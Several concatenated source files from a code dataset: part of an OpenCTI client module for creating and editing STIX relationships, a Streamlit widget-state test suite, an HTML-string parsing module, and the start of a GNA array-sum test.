"""
query StixCoreRelationship($id: String!) {
stixCoreRelationship(id: $id) {
"""
+ (
custom_attributes
if custom_attributes is not None
else self.properties
)
+ """
}
}
"""
)
result = self.opencti.query(query, {"id": id})
return self.opencti.process_multiple_fields(
result["data"]["stixCoreRelationship"]
)
elif from_id is not None and to_id is not None:
result = self.list(
elementId=element_id,
fromId=from_id,
toId=to_id,
relationship_type=relationship_type,
startTimeStart=start_time_start,
startTimeStop=start_time_stop,
stopTimeStart=stop_time_start,
stopTimeStop=stop_time_stop,
)
if len(result) > 0:
return result[0]
else:
return None
else:
self.opencti.log("error", "Missing parameters: id or from_id and to_id")
return None
"""
Create a stix_core_relationship object
:param name: the name of the Attack Pattern
:return stix_core_relationship object
"""
def create(self, **kwargs):
from_id = kwargs.get("fromId", None)
to_id = kwargs.get("toId", None)
stix_id = kwargs.get("stix_id", None)
relationship_type = kwargs.get("relationship_type", None)
description = kwargs.get("description", None)
start_time = kwargs.get("start_time", None)
stop_time = kwargs.get("stop_time", None)
revoked = kwargs.get("revoked", None)
confidence = kwargs.get("confidence", None)
lang = kwargs.get("lang", None)
created = kwargs.get("created", None)
modified = kwargs.get("modified", None)
created_by = kwargs.get("createdBy", None)
object_marking = kwargs.get("objectMarking", None)
object_label = kwargs.get("objectLabel", None)
external_references = kwargs.get("externalReferences", None)
kill_chain_phases = kwargs.get("killChainPhases", None)
update = kwargs.get("update", False)
self.opencti.log(
"info",
"Creating stix_core_relationship {" + from_id + ", " + to_id + "}.",
)
query = """
mutation StixCoreRelationshipAdd($input: StixCoreRelationshipAddInput!) {
stixCoreRelationshipAdd(input: $input) {
id
standard_id
entity_type
parent_types
}
}
"""
result = self.opencti.query(
query,
{
"input": {
"fromId": from_id,
"toId": to_id,
"stix_id": stix_id,
"relationship_type": relationship_type,
"description": description,
"start_time": start_time,
"stop_time": stop_time,
"revoked": revoked,
"confidence": confidence,
"lang": lang,
"created": created,
"modified": modified,
"createdBy": created_by,
"objectMarking": object_marking,
"objectLabel": object_label,
"externalReferences": external_references,
"killChainPhases": kill_chain_phases,
"update": update,
}
},
)
return self.opencti.process_multiple_fields(
result["data"]["stixCoreRelationshipAdd"]
)
"""
Update a stix_core_relationship object field
:param id: the stix_core_relationship id
:param input: the input of the field
:return The updated stix_core_relationship object
"""
def update_field(self, **kwargs):
id = kwargs.get("id", None)
input = kwargs.get("input", None)
if id is not None and input is not None:
self.opencti.log(
"info",
"Updating stix_core_relationship {" + id + "}",
)
query = """
mutation StixCoreRelationshipEdit($id: ID!, $input: [EditInput]!) {
stixCoreRelationshipEdit(id: $id) {
fieldPatch(input: $input) {
id
standard_id
entity_type
}
}
}
"""
result = self.opencti.query(
query,
{
"id": id,
"input": input,
},
)
return self.opencti.process_multiple_fields(
result["data"]["stixCoreRelationshipEdit"]["fieldPatch"]
)
else:
self.opencti.log(
"error",
"[opencti_stix_core_relationship] Missing parameters: id and key and value",
)
return None
"""
Delete a stix_core_relationship
:param id: the stix_core_relationship id
:return void
"""
def delete(self, **kwargs):
id = kwargs.get("id", None)
if id is not None:
self.opencti.log("info", "Deleting stix_core_relationship {" + id + "}.")
query = """
mutation StixCoreRelationshipEdit($id: ID!) {
stixCoreRelationshipEdit(id: $id) {
delete
}
}
"""
self.opencti.query(query, {"id": id})
else:
self.opencti.log(
"error", "[opencti_stix_core_relationship] Missing parameters: id"
)
return None
"""
Add a Marking-Definition object to stix_core_relationship object (object_marking_refs)
:param id: the id of the stix_core_relationship
:param marking_definition_id: the id of the Marking-Definition
:return Boolean
"""
def add_marking_definition(self, **kwargs):
id = kwargs.get("id", None)
marking_definition_id = kwargs.get("marking_definition_id", None)
if id is not None and marking_definition_id is not None:
custom_attributes = """
id
objectMarking {
edges {
node {
id
standard_id
entity_type
definition_type
definition
x_opencti_order
x_opencti_color
created
modified
}
}
}
"""
stix_core_relationship = self.read(
id=id, customAttributes=custom_attributes
)
if stix_core_relationship is None:
self.opencti.log(
"error", "Cannot add Marking-Definition, entity not found"
)
return False
if marking_definition_id in stix_core_relationship["objectMarkingIds"]:
return True
else:
self.opencti.log(
"info",
"Adding Marking-Definition {"
+ marking_definition_id
+ "} to Stix-Domain-Object {"
+ id
+ "}",
)
query = """
mutation StixCoreRelationshipAddRelation($id: ID!, $input: StixMetaRelationshipAddInput) {
stixCoreRelationshipEdit(id: $id) {
relationAdd(input: $input) {
id
}
}
}
"""
self.opencti.query(
query,
{
"id": id,
"input": {
"toId": marking_definition_id,
"relationship_type": "object-marking",
},
},
)
return True
else:
self.opencti.log(
"error", "Missing parameters: id and marking_definition_id"
)
return False
"""
Remove a Marking-Definition object to stix_core_relationship
:param id: the id of the stix_core_relationship
:param marking_definition_id: the id of the Marking-Definition
:return Boolean
"""
def remove_marking_definition(self, **kwargs):
id = kwargs.get("id", None)
marking_definition_id = kwargs.get("marking_definition_id", None)
if id is not None and marking_definition_id is not None:
self.opencti.log(
"info",
"Removing Marking-Definition {"
+ marking_definition_id
+ "} from stix_core_relationship {"
+ id
+ "}",
)
query = """
mutation StixCoreRelationshipRemoveRelation($id: ID!, $toId: String!, $relationship_type: String!) {
stixCoreRelationshipEdit(id: $id) {
relationDelete(toId: $toId, relationship_type: $relationship_type) {
id
}
}
}
"""
self.opencti.query(
query,
{
"id": id,
"toId": marking_definition_id,
"relationship_type": "object-marking",
},
)
return True
else:
self.opencti.log("error", "Missing parameters: id and label_id")
return False
"""
Add a Label object to stix_core_relationship(labelging)
:param id: the id of the stix_core_relationship
:param label_id: the id of the Label
:return Boolean
"""
def add_label(self, **kwargs):
id = kwargs.get("id", None)
label_id = kwargs.get("label_id", None)
label_name = kwargs.get("label_name", None)
if label_name is not None:
label = self.opencti.label.read(
filters=[{"key": "value", "values": [label_name]}]
)
if label:
label_id = label["id"]
else:
label = self.opencti.label.create(value=label_name)
label_id = label["id"]
if id is not None and label_id is not None:
self.opencti.log(
"info",
"Adding label {"
+ label_id
+ "} to stix-core-relationship {"
+ id
+ "}",
)
query = """
mutation StixCoreRelationshipAddRelation($id: ID!, $input: StixMetaRelationshipAddInput) {
stixCoreRelationshipEdit(id: $id) {
relationAdd(input: $input) {
id
}
}
}
"""
self.opencti.query(
query,
{
"id": id,
"input": {
"toId": label_id,
"relationship_type": "object-label",
},
},
)
return True
else:
self.opencti.log("error", "Missing parameters: id and label_id")
return False
"""
Add a External-Reference object to stix_core_relationship (external-reference)
:param id: the id of the stix_core_relationship
:param marking_definition_id: the id of the Marking-Definition
:return Boolean
"""
def add_external_reference(self, **kwargs):
id = kwargs.get("id", None)
external_reference_id = kwargs.get("external_reference_id", None)
if id is not None and external_reference_id is not None:
self.opencti.log(
"info",
"Adding External-Reference {"
+ external_reference_id
+ "} to stix-core-relationship {"
+ id
+ "}",
)
query = """
mutation StixCoreRelationshipEditRelationAdd($id: ID!, $input: StixMetaRelationshipAddInput) {
stixCoreRelationshipEdit(id: $id) {
relationAdd(input: $input) {
id
}
}
}
"""
self.opencti.query(
query,
{
"id": id,
"input": {
"toId": external_reference_id,
"relationship_type": "external-reference",
},
},
)
return True
else:
self.opencti.log(
"error", "Missing parameters: id and external_reference_id"
)
return False
"""
Remove a External-Reference object to stix_core_relationship object
:param id: the id of the stix_core_relationship
:param external_reference_id: the id of the External-Reference
:return Boolean
"""
def remove_external_reference(self, **kwargs):
id = kwargs.get("id", None)
external_reference_id = kwargs.get("external_reference_id", None)
if id is not None and external_reference_id is not None:
self.opencti.log(
"info",
"Removing External-Reference {"
+ external_reference_id
+ "} from stix_core_relationship {"
+ id
+ "}",
)
query = """
mutation StixCoreRelationshipRemoveRelation($id: ID!, $toId: String!, $relationship_type: String!) {
stixCoreRelationshipEdit(id: $id) {
relationDelete(toId: $toId, relationship_type: $relationship_type) {
id
}
}
}
"""
self.opencti.query(
query,
{
"id": id,
"toId": external_reference_id,
"relationship_type": "external-reference",
},
)
return True
else:
self.opencti.log("error", "Missing parameters: id and label_id")
return False
"""
Add a Kill-Chain-Phase object to stix_core_relationship object (kill_chain_phases)
:param id: the id of the stix_core_relationship
:param kill_chain_phase_id: the id of the Kill-Chain-Phase
:return Boolean
"""
def add_kill_chain_phase(self, **kwargs):
id = kwargs.get("id", None)
kill_chain_phase_id = kwargs.get("kill_chain_phase_id", None)
if id is not None and kill_chain_phase_id is not None:
self.opencti.log(
"info",
"Adding Kill-Chain-Phase {"
+ kill_chain_phase_id
+ "} to stix-core-relationship {"
+ id
+ "}",
)
query = """
mutation StixCoreRelationshipAddRelation($id: ID!, $input: StixMetaRelationshipAddInput) {
stixCoreRelationshipEdit(id: $id) {
relationAdd(input: $input) {
id
}
}
}
"""
self.opencti.query(
query,
{
"id": id,
"input": {
"toId": kill_chain_phase_id,
"relationship_type": "kill-chain-phase",
},
},
)
return True
else:
self.opencti.log(
"error",
"[opencti_stix_core_relationship] Missing parameters: id and kill_chain_phase_id",
)
return False
"""
Remove a Kill-Chain-Phase object to stix_core_relationship object
:param id: the id of the stix_core_relationship
:param kill_chain_phase_id: the id of the Kill-Chain-Phase
:return Boolean
"""
def remove_kill_chain_phase(self, **kwargs):
id = kwargs.get("id", None)
kill_chain_phase_id = kwargs.get("kill_chain_phase_id", None)
if id is not None and kill_chain_phase_id is not None:
self.opencti.log(
"info",
"Removing Kill-Chain-Phase {"
+ kill_chain_phase_id
+ "} from stix_core_relationship {"
+ id
+ "}",
)
query = """
mutation StixCoreRelationshipRemoveRelation($id: ID!, $toId: String!, $relationship_type: String!) {
stixCoreRelationshipEdit(id: $id) {
relationDelete(toId: $toId, relationship_type: $relationship_type) {
id
}
}
}
"""
self.opencti.query(
query,
{
"id": id,
"toId": kill_chain_phase_id,
"relationship_type": "kill-chain-phase",
},
)
return True
else:
self.opencti.log(
"error",
"[stix_core_relationship] Missing parameters: id and kill_chain_phase_id",
)
return False
"""
Update the Identity author of a stix_core_relationship object (created_by)
:param id: the id of the stix_core_relationship
:param identity_id: the id of the Identity
:return Boolean
"""
def update_created_by(self, **kwargs):
id = kwargs.get("id", None)
identity_id = kwargs.get("identity_id", None)
if id is not None:
self.opencti.log(
"info",
"Updating author of stix_core_relationship {"
+ id
+ "} with Identity {"
+ str(identity_id)
+ "}",
)
custom_attributes = """
id
createdBy {
... on Identity {
id
standard_id
entity_type
parent_types
name
x_opencti_aliases
description
created
modified
}
... on Organization {
x_opencti_organization_type
x_opencti_reliability
}
... on Individual {
x_opencti_firstname
x_opencti_lastname
}
}
"""
stix_domain_object = self.read(id=id, customAttributes=custom_attributes)
if stix_domain_object["createdBy"] is not None:
query = """
mutation StixCoreRelationshipEdit($id: ID!, $toId: String! $relationship_type: String!) {
stixCoreRelationshipEdit(id: $id) {
relationDelete(toId: $toId, relationship_type: $relationship_type) {
id
}
}
}
"""
self.opencti.query(
query,
{
"id": id,
"toId": stix_domain_object["createdBy"]["id"],
"relationship_type": "created-by",
},
)
if identity_id is not None:
# Add the new relation
query = """
mutation StixCoreRelationshipEdit($id: ID!, $input: StixMetaRelationshipAddInput) {
stixCoreRelationshipEdit(id: $id) {
relationAdd(input: $input) {
id
}
}
}
"""
variables = {
"id": id,
"input": {
"toId": identity_id,
"relationship_type": "created-by",
},
}
self.opencti.query(query, variables)
else:
self.opencti.log("error", "Missing parameters: id")
return False
"""
Import an Indicator object from a STIX2 object
:param stixObject: the Stix-Object Indicator
:return Indicator object
"""
def import_from_stix2(self, **kwargs):
stix_relation = kwargs.get("stixRelation", None)
extras = kwargs.get("extras", {})
update = kwargs.get("update", False)
default_date = kwargs.get("defaultDate", False)
if stix_relation is not None:
source_ref = stix_relation["source_ref"]
target_ref = stix_relation["target_ref"]
return self.create(
fromId=source_ref,
toId=target_ref,
stix_id=stix_relation["id"],
relationship_type=stix_relation["relationship_type"],
description=self.opencti.stix2.convert_markdown(
stix_relation["description"]
)
if "description" in stix_relation
else "",
start_time=stix_relation["start_time"]
if "start_time" in stix_relation
else default_date,
stop_time=stix_relation["stop_time"]
if "stop_time" in stix_relation
else default_date,
revoked=stix_relation["revoked"]
if "revoked" in stix_relation
else None,
confidence=stix_relation["confidence"]
if "confidence" in stix_relation
else None,
lang=stix_relation["lang"] if "lang" in stix_relation else None,
created=stix_relation["created"]
if "created" in stix_relation
else None,
modified=stix_relation["modified"]
if "modified" in stix_relation
else None,
createdBy=extras["created_by_id"]
if "created_by_id" in extras
else None,
objectMarking=extras["object_marking_ids"]
if "object_marking_ids" in extras
else None,
objectLabel=extras["object_label_ids"]
if "object_label_ids" in extras
else [],
externalReferences=extras["external_references_ids"]
if "external_references_ids" in extras
else [],
killChainPhases=extras["kill_chain_phases_ids"]
if "kill_chain_phases_ids" in extras
else None,
update=update,
)
else:
self.opencti.log(
"error", "[opencti_attack_pattern] Missing parameters: stixObject"
)
| 35.222222
| 409
| 0.431235
|
4a0a19b28db9e1a6b6f471cc8cb0591e27983e5e
| 11,669
|
py
|
Python
|
lib/tests/streamlit/state/widgets_test.py
|
stungkit/streamlit
|
3badd94f40ba8db2f9e89e8835f7f0530d290ba0
|
[
"Apache-2.0"
] | 1
|
2019-11-01T08:37:00.000Z
|
2019-11-01T08:37:00.000Z
|
lib/tests/streamlit/state/widgets_test.py
|
stungkit/streamlit
|
3badd94f40ba8db2f9e89e8835f7f0530d290ba0
|
[
"Apache-2.0"
] | 35
|
2021-10-12T04:41:39.000Z
|
2022-03-28T04:50:45.000Z
|
lib/tests/streamlit/state/widgets_test.py
|
stungkit/streamlit
|
3badd94f40ba8db2f9e89e8835f7f0530d290ba0
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2018-2022 Streamlit Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests widget-related functionality"""
import unittest
import pytest
from parameterized import parameterized
from unittest.mock import call, MagicMock
import streamlit as st
from streamlit import errors
from streamlit.proto.Button_pb2 import Button as ButtonProto
from streamlit.proto.WidgetStates_pb2 import WidgetStates
from streamlit.state.session_state import GENERATED_WIDGET_KEY_PREFIX
from streamlit.state.widgets import (
_get_widget_id,
coalesce_widget_states,
)
from streamlit.state.session_state import SessionState, WidgetMetadata
from tests import testutil
def _create_widget(id, states):
states.widgets.add().id = id
return states.widgets[-1]
def create_metadata(id, value_type):
return WidgetMetadata(id, lambda x, s: x, identity, value_type)
def identity(x):
return x
class WidgetManagerTests(unittest.TestCase):
def test_get(self):
states = WidgetStates()
_create_widget("trigger", states).trigger_value = True
_create_widget("bool", states).bool_value = True
_create_widget("float", states).double_value = 0.5
_create_widget("int", states).int_value = 123
_create_widget("string", states).string_value = "howdy!"
session_state = SessionState()
session_state.set_widgets_from_proto(states)
session_state._set_widget_metadata(create_metadata("trigger", "trigger_value"))
session_state._set_widget_metadata(create_metadata("bool", "bool_value"))
session_state._set_widget_metadata(create_metadata("float", "double_value"))
session_state._set_widget_metadata(create_metadata("int", "int_value"))
session_state._set_widget_metadata(create_metadata("string", "string_value"))
self.assertEqual(True, session_state["trigger"])
self.assertEqual(True, session_state["bool"])
self.assertAlmostEqual(0.5, session_state["float"])
self.assertEqual(123, session_state["int"])
self.assertEqual("howdy!", session_state["string"])
def test_get_nonexistent(self):
session_state = SessionState()
self.assertRaises(KeyError, lambda: session_state["fake_widget_id"])
@pytest.mark.skip
def test_get_keyed_widget_values(self):
states = WidgetStates()
_create_widget("trigger", states).trigger_value = True
_create_widget("trigger2", states).trigger_value = True
session_state = SessionState()
session_state.set_widgets_from_proto(states)
session_state._set_widget_metadata(
create_metadata("trigger", "trigger_value", True)
)
session_state._set_widget_metadata(create_metadata("trigger2", "trigger_value"))
self.assertEqual(dict(session_state.values()), {"trigger": True})
def test_get_prev_widget_value_nonexistent(self):
session_state = SessionState()
self.assertRaises(KeyError, lambda: session_state["fake_widget_id"])
def test_set_widget_attrs_nonexistent(self):
session_state = SessionState()
session_state._set_widget_metadata(create_metadata("fake_widget_id", ""))
self.assertTrue(
isinstance(
session_state._new_widget_state.widget_metadata["fake_widget_id"],
WidgetMetadata,
)
)
def test_call_callbacks(self):
"""Test the call_callbacks method in 6 possible cases:
1. A widget does not have a callback
2. A widget's old and new values are equal, so the callback is not
called.
3. A widget's callback has no args provided.
4. A widget's callback has just args provided.
5. A widget's callback has just kwargs provided.
6. A widget's callback has both args and kwargs provided.
"""
prev_states = WidgetStates()
_create_widget("trigger", prev_states).trigger_value = True
_create_widget("bool", prev_states).bool_value = True
_create_widget("bool2", prev_states).bool_value = True
_create_widget("float", prev_states).double_value = 0.5
_create_widget("int", prev_states).int_value = 123
_create_widget("string", prev_states).string_value = "howdy!"
session_state = SessionState()
session_state.set_widgets_from_proto(prev_states)
mock_callback = MagicMock()
deserializer = lambda x, s: x
callback_cases = [
("trigger", "trigger_value", None, None, None),
("bool", "bool_value", mock_callback, None, None),
("bool2", "bool_value", mock_callback, None, None),
("float", "double_value", mock_callback, (1,), None),
("int", "int_value", mock_callback, None, {"x": 2}),
("string", "string_value", mock_callback, (1,), {"x": 2}),
]
for widget_id, value_type, callback, args, kwargs in callback_cases:
session_state._set_widget_metadata(
WidgetMetadata(
widget_id,
deserializer,
lambda x: x,
value_type=value_type,
callback=callback,
callback_args=args,
callback_kwargs=kwargs,
)
)
states = WidgetStates()
_create_widget("trigger", states).trigger_value = True
_create_widget("bool", states).bool_value = True
_create_widget("bool2", states).bool_value = False
_create_widget("float", states).double_value = 1.5
_create_widget("int", states).int_value = 321
_create_widget("string", states).string_value = "!ydwoh"
session_state.on_script_will_rerun(states)
mock_callback.assert_has_calls([call(), call(1), call(x=2), call(1, x=2)])
def test_marshall_excludes_widgets_without_state(self):
widget_states = WidgetStates()
_create_widget("trigger", widget_states).trigger_value = True
session_state = SessionState()
session_state.set_widgets_from_proto(widget_states)
session_state._set_widget_metadata(
WidgetMetadata("other_widget", lambda x, s: x, None, "trigger_value", True)
)
widgets = session_state.get_widget_states()
self.assertEqual(len(widgets), 1)
self.assertEqual(widgets[0].id, "trigger")
def test_reset_triggers(self):
states = WidgetStates()
session_state = SessionState()
_create_widget("trigger", states).trigger_value = True
_create_widget("int", states).int_value = 123
session_state.set_widgets_from_proto(states)
session_state._set_widget_metadata(
WidgetMetadata("trigger", lambda x, s: x, None, "trigger_value")
)
session_state._set_widget_metadata(
WidgetMetadata("int", lambda x, s: x, None, "int_value")
)
self.assertTrue(session_state["trigger"])
self.assertEqual(123, session_state["int"])
session_state._reset_triggers()
self.assertFalse(session_state["trigger"])
self.assertEqual(123, session_state["int"])
def test_coalesce_widget_states(self):
session_state = SessionState()
old_states = WidgetStates()
_create_widget("old_set_trigger", old_states).trigger_value = True
_create_widget("old_unset_trigger", old_states).trigger_value = False
_create_widget("missing_in_new", old_states).int_value = 123
_create_widget("shape_changing_trigger", old_states).trigger_value = True
session_state._set_widget_metadata(
create_metadata("old_set_trigger", "trigger_value")
)
session_state._set_widget_metadata(
create_metadata("old_unset_trigger", "trigger_value")
)
session_state._set_widget_metadata(
create_metadata("missing_in_new", "int_value")
)
session_state._set_widget_metadata(
create_metadata("shape changing trigger", "trigger_value")
)
new_states = WidgetStates()
_create_widget("old_set_trigger", new_states).trigger_value = False
_create_widget("new_set_trigger", new_states).trigger_value = True
_create_widget("added_in_new", new_states).int_value = 456
_create_widget("shape_changing_trigger", new_states).int_value = 3
session_state._set_widget_metadata(
create_metadata("new_set_trigger", "trigger_value")
)
session_state._set_widget_metadata(create_metadata("added_in_new", "int_value"))
session_state._set_widget_metadata(
create_metadata("shape_changing_trigger", "int_value")
)
session_state.set_widgets_from_proto(
coalesce_widget_states(old_states, new_states)
)
self.assertRaises(KeyError, lambda: session_state["old_unset_trigger"])
self.assertRaises(KeyError, lambda: session_state["missing_in_new"])
self.assertEqual(True, session_state["old_set_trigger"])
self.assertEqual(True, session_state["new_set_trigger"])
self.assertEqual(456, session_state["added_in_new"])
# Widgets that were triggers before, but no longer are, will *not*
# be coalesced
self.assertEqual(3, session_state["shape_changing_trigger"])
class WidgetHelperTests(unittest.TestCase):
def test_get_widget_with_generated_key(self):
button_proto = ButtonProto()
button_proto.label = "the label"
self.assertTrue(
_get_widget_id("button", button_proto).startswith(
GENERATED_WIDGET_KEY_PREFIX
)
)
class WidgetIdDisabledTests(testutil.DeltaGeneratorTestCase):
@parameterized.expand(
[
(st.button,),
(st.camera_input,),
(st.checkbox,),
(st.color_picker,),
(st.file_uploader,),
(st.number_input,),
(st.slider,),
(st.text_area,),
(st.text_input,),
(st.date_input,),
(st.time_input,),
]
)
def test_disabled_parameter_id(self, widget_func):
widget_func("my_widget")
# The `disabled` argument shouldn't affect a widget's ID, so we
# expect a DuplicateWidgetID error.
with self.assertRaises(errors.DuplicateWidgetID):
widget_func("my_widget", disabled=True)
def test_disabled_parameter_id_download_button(self):
st.download_button("my_widget", data="")
with self.assertRaises(errors.DuplicateWidgetID):
st.download_button("my_widget", data="", disabled=True)
@parameterized.expand(
[
(st.multiselect,),
(st.radio,),
(st.select_slider,),
(st.selectbox,),
]
)
def test_disabled_parameter_id_options_widgets(self, widget_func):
options = ["a", "b", "c"]
widget_func("my_widget", options)
with self.assertRaises(errors.DuplicateWidgetID):
widget_func("my_widget", options, disabled=True)
| 37.400641
| 88
| 0.664239
|
4a0a1a3abc058fd9e02c03c20b12a563365bdcf2
| 7,493
|
py
|
Python
|
pyparsehtml/src/parse_doc_string.py
|
pdoms/PyParseHtml
|
513ad30cdfb77eea815b66b1ad91c1c96f3dff81
|
[
"MIT"
] | null | null | null |
pyparsehtml/src/parse_doc_string.py
|
pdoms/PyParseHtml
|
513ad30cdfb77eea815b66b1ad91c1c96f3dff81
|
[
"MIT"
] | null | null | null |
pyparsehtml/src/parse_doc_string.py
|
pdoms/PyParseHtml
|
513ad30cdfb77eea815b66b1ad91c1c96f3dff81
|
[
"MIT"
] | null | null | null |
import re
import copy
from .element import Element
from .utils import isSelfCloser, mergeDict, representElementAsString, seqIdtoDict, getTagBySeqId
from .html_data import global_attributes, css_properties, html_tags_incl_attributes, html_tags_stripped
def addGlobalAttributes():
attributes = {}
for g in global_attributes:
if g == 'style':
attributes[g] = {}
for prop in css_properties:
attributes[g][prop] = ""
else:
attributes[g] = ""
return attributes
def addSpecificAttributes(meta_tag):
attributes = {}
for a in html_tags_incl_attributes[meta_tag['as_tag_identifier']]:
attributes[a] = ""
return attributes
def sortTags(tags):
return sorted(tags, key = lambda i: i['start_idx'])
def getInnerContents(tags_up, input):
for t in tags_up:
if t['tag_role'] == 'open_close' or t['tag_role'] == 'open_close_alt':
continue
else:
t['innerHTML'] = input[t['end_idx']+1:t['closer']['start_idx']]
t['outerHTML'] = input[t['start_idx']:t['closer']['end_idx']]
return tags_up
def hasClosingTags(collected):
result = False
for no, c in enumerate(collected):
if c['tag_role'] == 'close' and no != 1:
result = True
return result
def identifyTags(input):
collected_tags = []
for tag in html_tags_stripped:
as_open = re.findall(f'<{tag}(?=\s)', input)
as_close = re.findall(f'</{tag}', input)
##handle openers
current_idx = 0
for o in as_open:
meta_tag = {}
meta_tag['tag_type'] = tag
matcher = f"<{tag} />"
meta_tag['start_idx'] = input.index(o, current_idx)
meta_tag['end_idx'] = input.index('>', meta_tag['start_idx'])
meta_tag['with_attributes'] = input[meta_tag['start_idx']:meta_tag['end_idx'] +1]
if isSelfCloser(matcher):
meta_tag['tag_role'] = 'open_close'
meta_tag['as_tag_identifier'] = matcher
else:
meta_tag['as_tag_identifier'] = f"<{tag}>"
if meta_tag['end_idx'] > input.index('/', meta_tag['start_idx']):
meta_tag['tag_role'] = 'open_close_alt'
else:
meta_tag['tag_role'] = 'open'
specific = addSpecificAttributes(meta_tag)
globals = addGlobalAttributes()
meta_tag['allowed_attributes'] = mergeDict([globals, specific])
meta_tag['rest_string'] = input[meta_tag['end_idx'] + 1:]
current_idx = meta_tag['end_idx']
collected_tags.append(meta_tag)
##handle closers
current_idx = 0
for c in as_close:
meta_tag = {}
meta_tag['tag_type'] = tag
meta_tag['tag_role'] = 'close'
meta_tag['as_tag_identifier'] = f"{o}>"
meta_tag['start_idx'] = input.index(c, current_idx)
meta_tag['end_idx'] = input.index('>', meta_tag['start_idx'])
meta_tag['with_attributes'] = ""
meta_tag['rest_string'] = input[meta_tag['end_idx'] + 1:]
collected_tags.append(meta_tag)
current_idx = meta_tag['end_idx'] +1
return collected_tags
def parseStyleString(styles_, tag_styles):
for val in styles_.split(";"):
if (val == ""):
continue
else:
idx = val.index(":")
kee = val[:idx].strip()
value = val[idx+1:].strip()
tag_styles[kee] = value
return tag_styles
def parseAttributes(tags):
for tag in tags:
#loop through the attribute keys
for kee in tag['allowed_attributes'].keys():
tag_with = tag['with_attributes']
if f"{kee}=" not in tag_with:
continue
else:
idx = tag_with.index(f"{kee}=")
idx_equ = tag_with.index("=", idx)
quot_type = tag_with[idx_equ + 1]
idx_end = tag_with.index(quot_type, idx_equ + 2)
if kee == 'style':
tag['allowed_attributes'][kee] = parseStyleString(tag_with[idx_equ+2:idx_end], tag['allowed_attributes'][kee])
else:
tag['allowed_attributes'][kee] = tag_with[idx_equ+2:idx_end]
return tags
def createSequence(sorted_tags):
sequence = []
for i, t in enumerate(sorted_tags):
t['seq_id'] = f"{str(i)}-$$_{t['tag_type']}"
sequence.append(t['seq_id'])
return (sequence, sorted_tags)
def matchTokens(tags_collected):
tags = sortTags(tags_collected)
(seq, tags) = createSequence(tags)
updated_tags = []
to_remove = []
no_of_open = 0
for t in tags:
if t['tag_role'] == 'open':
no_of_open += 1
if t['tag_role'] == 'open_close':
s = t['seq_id']
t['seq_id'] = s.replace('$$', "3")
s_idx = seq.index(s)
seq[s_idx] = t['seq_id']
updated_tags.append(t)
to_remove.append(t)
if t['tag_role'] == 'open_close_alt':
s = t['seq_id']
t['seq_id'] = s.replace('$$', "3")
s_idx = seq.index(s)
seq[s_idx] = t['seq_id']
updated_tags.append(t)
to_remove.append(t)
for item in to_remove:
tags.remove(item)
#count open tags?
current_length = len(tags)
while no_of_open > 0:
for i in reversed(range(0, current_length)):
open = {}
close = {}
if tags[i]['tag_role'] == 'open':
open = tags[i]
open_s = tags[i]['seq_id']
open['seq_id'] = open['seq_id'].replace('$$', "1")
seq[seq.index(open_s)] = open['seq_id']
open_seq = seqIdtoDict(open['seq_id'])
for f in range(i, len(tags)):
if tags[f]['tag_role'] == 'close':
close = tags[f]
close_s = tags[f]['seq_id']
close['seq_id'] = f"{open_seq['seq_unique']}-2_{open_seq['seq_tag_type']}"
seq[seq.index(close_s)] = close['seq_id']
break
# wrong - needs to be a copy of the unfinished seq ID
open['closer'] = close
updated_tags.append(open)
tags.remove(open)
tags.remove(close)
break
current_length = len(tags)
no_of_open -= 1
return (seq, updated_tags)
# lifts style, id, class attributes to top level
def liftAttributes(tags):
rel_attr = ['id', 'style', 'class']
for tag in tags:
for att in rel_attr:
tag[att] = tag['allowed_attributes'][att]
tag['allowed_attributes'].pop(att)
return tags
def getText(seq_id, next_tag, tags):
element = getTagBySeqId(tags, seq_id['seq_id'])
text_after = element['rest_string']
idx = -1
next = next_tag['seq_tag_type']
if next_tag['seq_tag_role'] == '2':
idx = text_after.find(f'</{next}')
else:
idx = text_after.find(f'<{next}')
if idx == -1:
return ''
else:
return '$_text_$_' + text_after[0:idx]
def handleTexts(sqs, tgs):
items = []
for s in range(0, len(sqs) - 1):
item = {}
seq_current = seqIdtoDict(sqs[s])
seq_next = seqIdtoDict(sqs[s+1])
item['after'] = sqs[s]
item['text'] = getText(seq_current, seq_next, tgs)
items.append(item)
for i in items:
if i['text'] != '$_text_$':
idx = sqs.index(i['after'])
sqs.insert(idx+1, i['text'])
return sqs
#find a way to represent dom as dictionary with levels of nesting (irrelevant of text, just to have it ready)
#e.g:
#body: {
# div: {
# text: ...
# p: {},
# p: {},
# p: {
# img: {}
# }
# }
# div: {}
# }
#
#
#
#
def mapHTMLString(input):
tags = identifyTags(input)
(seq, tags) = matchTokens(tags)
tags = getInnerContents(tags, input)
tags = parseAttributes(tags)
tags = liftAttributes(tags)
seq = handleTexts(seq, tags)
tags_asClass = []
for e in tags:
element = Element(e)
tags_asClass.append(element)
return (seq, tags_asClass)
| 28.599237
| 120
| 0.605899
|
4a0a1c8d1caa55fef2e510f694b9be62ef57b02d
| 1,622
|
py
|
Python
|
tests/unit/transformations/test_arrsum.py
|
gnafit/gna
|
c1a58dac11783342c97a2da1b19c97b85bce0394
|
[
"MIT"
] | 5
|
2019-10-14T01:06:57.000Z
|
2021-02-02T16:33:06.000Z
|
tests/unit/transformations/test_arrsum.py
|
gnafit/gna
|
c1a58dac11783342c97a2da1b19c97b85bce0394
|
[
"MIT"
] | null | null | null |
tests/unit/transformations/test_arrsum.py
|
gnafit/gna
|
c1a58dac11783342c97a2da1b19c97b85bce0394
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import numpy as np
from load import ROOT as R
from gna.env import env
from gna.parameters.printer import print_parameters
from gna import constructors as C
from gna.unittest import *
@floatcopy(globals(), addname=True)
def test_arrsum(function_name):
varname = 'out'
ns = env.globalns(function_name)
names = ["var1", "var2", "var3", "var4"]
variables = [ns.reqparameter(name, central=float(i), relsigma=0.1)
for i, name in enumerate(names)]
with ns:
var_arr = C.VarArray(names)
print("Input var array ", var_arr.vararray.points.data())
sum_arr = C.ArraySum(varname, var_arr, ns=ns)
# materialize variable
ns[varname].get()
output = var_arr.vararray.points
print('Data:', output.data(), output.data().sum())
